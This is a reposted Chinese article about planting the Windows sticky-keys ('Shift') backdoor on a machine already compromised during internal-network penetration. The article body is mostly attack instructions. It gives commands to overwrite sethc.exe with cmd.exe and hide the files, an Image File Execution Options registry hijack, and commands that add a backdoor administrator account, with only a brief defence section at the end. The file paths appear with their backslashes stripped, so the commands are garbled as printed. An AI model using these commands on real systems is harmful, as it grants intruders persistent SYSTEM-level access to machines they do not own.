0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

Windows Shift后门利用

jf_hKIAo4na 来源:Mi1k7ea 2023-01-30 10:38 次阅读
加入交流群
微信小助手二维码

扫码添加小助手

加入工程师交流群

0x00 前言

通常,在内网渗透打下一台机子之后,可以给这台机子留个Shift后门。

0x01 Shift后门利用

简介

粘滞键漏洞,在Windows系统下连续按5下SHIFT键,可以启动系统的粘滞键功能,其进程名为Sethc.exe,应用程序在Windowssystem32下。

黑客用其它应用程序(如:cmd.exe、explorer.exe 或木马、病毒)将Sethc.exe替换。当再次连续按5次SHIFT键,就会启动黑客替换的应用程序,如此便留下了5下SHIFT后门,黑客3389登录远程计算机时,在用户登录界面,连续按5下SHIFT就可以启动该漏洞,进而控制远程计算机。

漏洞原理

在Windows系统登录界面状态下,粘滞键仍可以以连续按5下SHIFT键运行,并且此时应用程序会以WINDOWS的最高权限-SYSTEM权限运行,所以计算机一旦被安装该后门,入侵者便可悄无声息地远程操纵计算机。

漏洞利用

大致思路如下:

拿到目标主机权限后,到Windowssystem32目录下,将sethc.exe替换成cmd.exe;

其中,命令行方式为:

copy c:windowssystem32cmd.exe c:windowssystem32sethc.exe
copy c:windowssystem32sethc.exe c:windowssystem32dllcachesethc.exe
attrib c:windowssystem32sethc.exe +h
attrib c:windowssystem32dllcachesethc.exe +h

注意:要将dllcache文件夹中的缓存删掉,否则会自动复原回去。

注册表方式为:

REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe" /v Debugger /t REG_SZ /d "C:windowssystem32cmd.exe"

命令说明:reg add是向注册表添加记录,后面跟的是注册表的位置,注意的是HKLM是HKEY_LOCAL_MACHINE的缩写。Image File Execution Option这个目录是用来设置镜像劫持的,要被劫持的就是命令中的sethc粘滞键程序,随后通过/ v来指定键名,其中键名debugger是固定的,然后通过/ t来指定REG_SZ字符串类型,最后通过/ d来指定键的值,即被恶意替换的程序cmd.exe。

这样,在下次远程连接目标主机登录的时候就可以连续5下SHIFT触发cmd.exe;

可以输入explorer.exe调出程序管理系统方便操作;

当然,上面的方法存在缺陷,就是可能会导致远程连接无法持久进行,因此可以直接添加新用户便于下次直接登录:

net user mi1k7ea 123456 /add
net localgroup administrators mi1k7ea /add'

防御方法

如果系统盘为NTFS文件系统,可以将sytem32下的sethc.exe文件设为everyone拒绝访问;

直接将其删除,最好的方法是在控制面板-辅助功能选项-粘滞键选项,将“使用快捷键”取消即可。;

通过注册表设置实现防御;

审核编辑 :李倩

声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • WINDOWS
    +关注

    关注

    4

    文章

    3710

    浏览量

    94447
  • 应用程序
    +关注

    关注

    38

    文章

    3347

    浏览量

    60504
  • Shift
    +关注

    关注

    0

    文章

    5

    浏览量

    7681

原文标题:Windows Shift后门利用

文章出处:【微信号:菜鸟学安全,微信公众号:菜鸟学安全】欢迎添加关注!文章转载请注明出处。

收藏 人收藏
加入交流群
微信小助手二维码

扫码添加小助手

加入工程师交流群

    评论

    相关推荐
    热点推荐

    你的手机在监听!国安部曝光境外芯片可能暗藏“后门

    电子发烧友网报道(文/黄山明)如果家中门锁有一把钥匙掌握在自己不知道的人手中,相信住在里面的人也不会安心。如果是芯片被安装了“后门”,那么被保存在其中的资料,自然存在泄露的风险。近期,国家安全部公开
    的头像 发表于 07-22 07:31 1w次阅读

    如何在Windows上安装最新的deepin 25 WSL版本

    在日常的开发与测试中,许多用户希望能在 Windows 环境下便捷地使用 Linux 工具链。此时,WSL(Windows Subsystem for Linux,适用于 Linux 的 Windows 子系统) 便是最佳选择。
    的头像 发表于 05-08 14:31 218次阅读
    如何在<b class='flag-5'>Windows</b>上安装最新的deepin 25 WSL版本

    windows系统的平板找不到SIM卡槽在哪里? 试试这个方法!#三防平板电脑 #工业平板

    Windows系统
    高通电子三防平板电脑
    发布于 :2025年12月04日 14:04:14

    从零开始利用NMSIS库搭建神经网络(一)

    环境:Vivado2021.1、NucleiStudio_IDE_202102-win64 内容:从零开始利用NMSIS库搭建神经网络,这一节主讲基本的NMSIS库卷积函数的解读。 一、自测检查
    发表于 10-24 13:47

    行业观察 | Windows 10于本月终止服务支持,微软发布10月高危漏洞更新

    已被实际利用的零日漏洞,以及多个CVSS评分高达9.9的关键远程代码执行漏洞。随着Windows10于本月终止服务支持,IT团队面临关键的更新周期,需重点关注身份认
    的头像 发表于 10-16 16:57 2096次阅读
    行业观察 | <b class='flag-5'>Windows</b> 10于本月终止服务支持,微软发布10月高危漏洞更新

    工业场景安全需求升级,RT-Thread 睿赛德全栈方案破解 OS 安全与效率痛点

    ” 2025年4月,我国公安机关正式通缉三个美国国家安全局(NSA)的特工,因其被怀疑对哈尔滨2025年亚洲冬季运动会进行了网络攻击。这些美国特工利用微软Windows系统发送加密指令,在远程启动隐藏的后门成功入侵了黑龙江省内的
    的头像 发表于 09-17 15:39 954次阅读

    英伟达被约谈!“后门”风险阴影下,人脸识别终端为何选国产芯片

    7月31日消息,为维护中国用户网络安全、数据安全,国家互联网信息办公室已约谈英伟达,要求英伟达公司就对华销售的H20算力芯片漏洞后门安全风险问题进行说明,并提交相关证明材料。英伟达芯片是否存在芯片
    的头像 发表于 08-08 09:43 1067次阅读
    英伟达被约谈!“<b class='flag-5'>后门</b>”风险阴影下,人脸识别终端为何选国产芯片

    CYBLE-416045_EVAL BLE如何连接到Windows

    我尝试使用 Windows BLE UI 设置将PSoC™ CYBLE-416045_EVAL 与我的 Windows over BLE 配对。 我正在运行一个示例
    发表于 07-24 07:03

    国安部:境外产芯片或故意留“后门

    根据国家安全部微信公众号发布的消息,我们发现居然有境外产芯片或故意留“后门”。 当心你身边的“隐形窃密通道” 在如今高度数字化的时代,网络安全的重要性愈发凸显,不仅关乎着个人隐私、企业秘密,甚至
    的头像 发表于 07-21 11:47 1.1w次阅读

    今日看点丨国安部:境外生产芯片可能留“后门” 摄像头被远程开启;英特尔终止了对 Clear Linux 的支持;宇

          1、国安部:境外生产芯片可能留“后门” 摄像头被远程开启 据国家安全部官微消息,一些境外生产的芯片、智能设备或者软件可能在设计制造阶段就被故意预埋了后门,厂商可以通过特定信号对设备进行
    发表于 07-21 10:51 2733次阅读
    今日看点丨国安部:境外生产芯片可能留“<b class='flag-5'>后门</b>” 摄像头被远程开启;英特尔终止了对 Clear Linux 的支持;宇

    Windows环境下32位汇编语言中文资料

    电子发烧友网站提供《Windows环境下32位汇编语言中文资料.rar》资料免费下载
    发表于 06-30 15:14 0次下载

    国产海光OPS电脑怎样快速切换windows和国产麒麟统信系统

    WINDOWS
    深圳双芯信息科技有限公司
    发布于 :2025年06月23日 12:40:57

    龙芯处理器支持WINDOWS吗?

    龙芯处理器目前不支持原生运行Windows操作系统,主要原因如下: 架构差异 龙芯架构:龙芯早期基于MIPS架构,后续转向自主研发的LoongArch指令集(与x86/ARM不兼容
    发表于 06-05 14:24

    统信Windows应用兼容引擎V3.3.0更新

    为打破平台界限,让应用体验无缝衔接,deepin 团队基于 Wine 技术,推出了“统信 Windows 应用兼容引擎”,支持在 deepin 和统信 UOS 系统上直接双击运行 Windows
    的头像 发表于 06-04 13:58 1950次阅读

    值得体验的多款Windows on Arm应用

    随着越来越多的开发者纷纷通过 Arm 原生支持的方式,打造更快速、更智能的应用体验,Windows on Arm 的发展势头和用户普及率持续加速升温。如今,普通 Windows 用户有超过 90
    的头像 发表于 05-28 13:56 2417次阅读